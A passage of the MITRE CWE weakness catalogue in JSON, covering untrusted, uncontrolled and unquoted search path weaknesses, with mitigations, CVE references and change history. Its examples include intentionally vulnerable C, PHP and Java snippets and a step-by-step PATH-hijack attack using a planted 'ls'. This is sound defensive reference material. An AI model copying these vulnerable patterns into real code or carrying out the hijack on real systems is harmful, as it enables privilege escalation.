consulted to locate a DLL, if the DLL is not found in other paths that appear earlier in the search order."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"673","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"427","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"428","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Untrusted Path"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The program could be redirected to the wrong files, potentially triggering a crash or hang when the targeted file is too large or does not have the expected format."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The program could send the output of unauthorized files to the attacker."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-11"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and look for library functions and system calls that suggest when a search path is being used. One pattern is when the program performs multiple accesses of the same file but in different directories, with repeated failures until the proper filename is found. Library calls such as getenv() or their equivalent can be checked to see if any path-related variables are being accessed."]}},{"Method":"Automated Static Analysis","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Method":"Manual Analysis","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428."},{"Phase":"Implementation","Description":"When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths."},{"Phase":"Implementation","Description":"Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths."},{"Phase":"Implementation","Description":"Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory."},{"Phase":"Implementation","Description":"Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of it, while execl() and execv() require a full path."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-67"},"Intro_Text":"This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define DIR \\"/restricted/directory\\"char cmd[500];sprintf(cmd, \\"ls -l %480s\\", DIR);RaisePrivileges(...);system(cmd);DropPrivileges(...);...","xhtml:br":["","","","","","","","",""],"xhtml:i":"/* Raise privileges to those needed for accessing DIR. */"}},{"attr":{"@_Nature":"attack"},"xhtml:ul":{"xhtml:li":["The user sets the PATH to reference a directory under the attacker\'s control, such as \\"/my/dir/\\".","The attacker creates a malicious program called \\"ls\\", and puts that program in /my/dir","The user executes the program.","When system() is executed, the shell consults the PATH to find the ls program","The program finds the attacker\'s malicious program, \\"/my/dir/ls\\". It doesn\'t find \\"/bin/ls\\" because PATH does not contain \\"/bin/\\".","The program executes the attacker\'s malicious program with the raised privileges."]}}],"Body_Text":["This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can\'t control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges.","However, because the program does not modify the PATH environment variable, the following attack would work:"]},{"attr":{"@_Demonstrative_Example_ID":"DX-68"},"Intro_Text":"This code prints all of the running processes belonging to the current user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$userName = getCurrentUser();$command = \'ps aux | grep \' . $userName;system($command);","xhtml:br":["","","",""],"xhtml:i":"//assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78)"}},"Body_Text":"If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users."},{"attr":{"@_Demonstrative_Example_ID":"DX-29"},"Intro_Text":"The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...System.Runtime.getRuntime().exec(\\"make\\");...","xhtml:br":["",""]}},"Body_Text":"The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker\'s make will now be run with these privileges, possibly giving the attacker complete control of the system."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1120","Description":"Application relies on its PATH environment variable to find and execute program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1120"},{"Reference":"CVE-2008-1810","Description":"Database application relies on its PATH environment variable to find and execute program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1810"},{"Reference":"CVE-2007-2027","Description":"Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2027"},{"Reference":"CVE-2008-3485","Description":"Untrusted search path using malicious .EXE in Windows environment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3485"},{"Reference":"CVE-2008-2613","Description":"setuid program allows compromise using path that finds and loads a malicious library.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2613"},{"Reference":"CVE-2008-1319","Description":"Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1319"}]},"Functional_Areas":{"Functional_Area":["Program Invocation","Code Libraries"]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Untrusted Search Path"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Relative path library search"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV03-C","Entry_Name":"Sanitize the environment when invoking external programs"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"38"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, Process Attributes, page 603"}},{"attr":{"@_External_Reference_ID":"REF-176","@_Section":"Chapter 8, &#34;Canonical Representation Issues.&#34; Page 229"}},{"attr":{"@_External_Reference_ID":"REF-207","@_Section":"Chapter 12, &#34;Trust Management and Input Validation.&#34; Pages&#xA;                  317-320."}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, &#34;Don\'t Trust the PATH - Use Full Path Names&#34; Page 385"}}]},"Notes":{"Note":{"#text":"Search path issues on Windows are under-studied and possibly under-reported.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"427":{"attr":{"@_ID":"427","@_Name":"Uncontrolled Search Path Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors.","Extended_Description":{"xhtml:p":["Although this weakness can occur with any type of resource, it is frequently introduced when a product uses a directory search path to find executables or code libraries, but the path contains a directory that can be modified by an attacker, such as \\"/tmp\\" or the current working directory.","In Windows-based systems, when the LoadLibrary or LoadLibraryEx function is called with a DLL name that does not contain a fully qualified path, the function follows a search order that includes two path elements that might be uncontrolled:","In some cases, the attack can be conducted remotely, such as when SMB or WebDAV network shares are used.","In some Unix-based systems, a PATH might be created that contains an empty element, e.g. by splicing an empty variable into the PATH. This empty element can be interpreted as equivalent to the current working directory, which might be an untrusted search element.","In software package management frameworks (e.g., npm, RubyGems, or PyPi), the framework may identify dependencies on third-party libraries or other packages, then consult a repository that contains the desired package. The framework may search a public repository before a private repository. This could be exploited by attackers by placing a malicious package in the public repository that has the same name as a package from the private repository. The search path might not be directly under control of the developer relying on the framework, but this search order effectively contains an untrusted element."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["the directory from which the program has been loaded","the current working directory."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"DLL preloading","Description":"This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427."},{"Term":"Binary planting","Description":"This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427."},{"Term":"Insecure library loading","Description":"This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427."},{"Term":"Dependency confusion","Description":"As of February 2021, this term is used to describe CWE-427 in the context of managing installation of software package dependencies, in which attackers release packages on public sites where the names are the same as package names used by private repositories, and the search for the dependent package tries the public site first, downloading untrusted code. It may also be referred to as a \\"substitution attack.\\""}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428."},{"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths."},{"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths."},{"Phase":"Implementation","Description":"Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory. Since this is a denylist approach, it might not be a complete solution."},{"Phase":"Implementation","Description":"Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of finding the program using the PATH environment variable, while execl() and execv() require a full path."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-29"},"Intro_Text":"The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...System.Runtime.getRuntime().exec(\\"make\\");...","xhtml:br":["",""]}},"Body_Text":"The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker\'s make will now be run with these privileges, possibly giving the attacker complete control of the system."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-3402","Description":"\\"DLL hijacking\\" issue in document editor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3402"},{"Reference":"CVE-2010-3397","Description":"\\"DLL hijacking\\" issue in encryption software.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3397"},{"Reference":"CVE-2010-3138","Description":"\\"DLL hijacking\\" issue in library used by multiple media players.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3138"},{"Reference":"CVE-2010-3152","Description":"\\"DLL hijacking\\" issue in illustration program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3152"},{"Reference":"CVE-2010-3147","Description":"\\"DLL hijacking\\" issue in address book.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3147"},{"Reference":"CVE-2010-3135","Description":"\\"DLL hijacking\\" issue in network monitoring software.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3135"},{"Reference":"CVE-2010-3131","Description":"\\"DLL hijacking\\" issue in web browser.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3131"},{"Reference":"CVE-2010-1795","Description":"\\"DLL hijacking\\" issue in music player/organizer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1795"},{"Reference":"CVE-2002-1576","Description":"Product uses the current working directory to find and execute a program, which allows local users to gain privileges by creating a symlink that points to a malicious version of the program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1576"},{"Reference":"CVE-1999-1461","Description":"Product trusts the PATH environmental variable to find and execute a program, which allows local users to obtain root access by modifying the PATH to point to a malicous version of that program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1461"},{"Reference":"CVE-1999-1318","Description":"Software uses a search path that includes the current working directory (.), which allows local users to gain privileges via malicious programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1318"},{"Reference":"CVE-2003-0579","Description":"Admin software trusts the user-supplied -uv.install command line option to find and execute the uv.install program, which allows local users to gain privileges by providing a pathname that is under control of the user.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0579"},{"Reference":"CVE-2000-0854","Description":"When a document is opened, the directory of that document is first used to locate DLLs , which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0854"},{"Reference":"CVE-2001-0943","Description":"Database trusts the PATH environment variable to find and execute programs, which allows local users to modify the PATH to point to malicious programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0943"},{"Reference":"CVE-2001-0942","Description":"Database uses an environment variable to find and execute a program, which allows local users to execute arbitrary programs by changing the environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0942"},{"Reference":"CVE-2001-0507","Description":"Server uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a malicious file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0507"},{"Reference":"CVE-2002-2017","Description":"Product allows local users to execute arbitrary code by setting an environment variable to reference a malicious program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2017"},{"Reference":"CVE-1999-0690","Description":"Product includes the current directory in root\'s PATH variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0690"},{"Reference":"CVE-2001-0912","Description":"Error during packaging causes product to include a hard-coded, non-standard directory in search path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0912"},{"Reference":"CVE-2001-0289","Description":"Product searches current working directory for configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0289"},{"Reference":"CVE-2005-1705","Description":"Product searches current working directory for configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1705"},{"Reference":"CVE-2005-1307","Description":"Product executable other program from current working directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1307"},{"Reference":"CVE-2002-2040","Description":"Untrusted path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2040"},{"Reference":"CVE-2005-2072","Description":"Modification of trusted environment variable leads to untrusted path vulnerability.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2072"},{"Reference":"CVE-2005-1632","Description":"Product searches /tmp for modules before other paths.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1632"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Uncontrolled Search Path Element"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"38"}},{"attr":{"@_CAPEC_ID":"471"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-409"}},{"attr":{"@_External_Reference_ID":"REF-410"}},{"attr":{"@_External_Reference_ID":"REF-411"}},{"attr":{"@_External_Reference_ID":"REF-412"}},{"attr":{"@_External_Reference_ID":"REF-413"}},{"attr":{"@_External_Reference_ID":"REF-414"}},{"attr":{"@_External_Reference_ID":"REF-415"}},{"attr":{"@_External_Reference_ID":"REF-416"}},{"attr":{"@_External_Reference_ID":"REF-417"}},{"attr":{"@_External_Reference_ID":"REF-1168"}},{"attr":{"@_External_Reference_ID":"REF-1169"}},{"attr":{"@_External_Reference_ID":"REF-1170"}}]},"Notes":{"Note":[{"#text":"Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere (i.e., modification of a search path), this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control (i.e., the search path cannot be modified by an attacker, but one element of the path can be under attacker control).","attr":{"@_Type":"Relationship"}},{"#text":"This weakness is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model might need enhancement or clarification.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Maintenance_Notes, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Observed_Examples, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Description, Maintenance_Notes, References, Theoretical_Notes"}]}},"428":{"attr":{"@_ID":"428","@_Name":"Unquoted Search Path or Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.","Extended_Description":"If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as \\"C:\\\\Program.exe\\" to be run by a privileged program making use of WinExec.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":[{"attr":{"@_Name":"Windows NT","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"macOS","@_Prevalence":"Rarely"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Properly quote the full search path before executing a program on the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"UINT errCode = WinExec( \\"C:\\\\\\\\Program Files\\\\\\\\Foo\\\\\\\\Bar\\", SW_SHOW );"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1185","Description":"Small handful of others. Program doesn\'t quote the \\"C:\\\\Program Files\\\\\\" path when calling a program to be executed - or any other path with a directory or file whose name contains a space - so attacker can put a malicious program.exe into C:.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1185"},{"Reference":"CVE-2005-2938","Description":"CreateProcess() and CreateProcessAsUser() can be misused by applications to allow \\"program.exe\\" style attacks in C:","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2938"},{"Reference":"CVE-2000-1128","Description":"Applies to \\"Common Files\\" folder, with a malicious common.exe, instead of \\"Program Files\\"/program.exe.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1128"}]},"Functional_Areas":{"Functional_Area":"Program Invocation"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unquoted Search Path or Element"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, 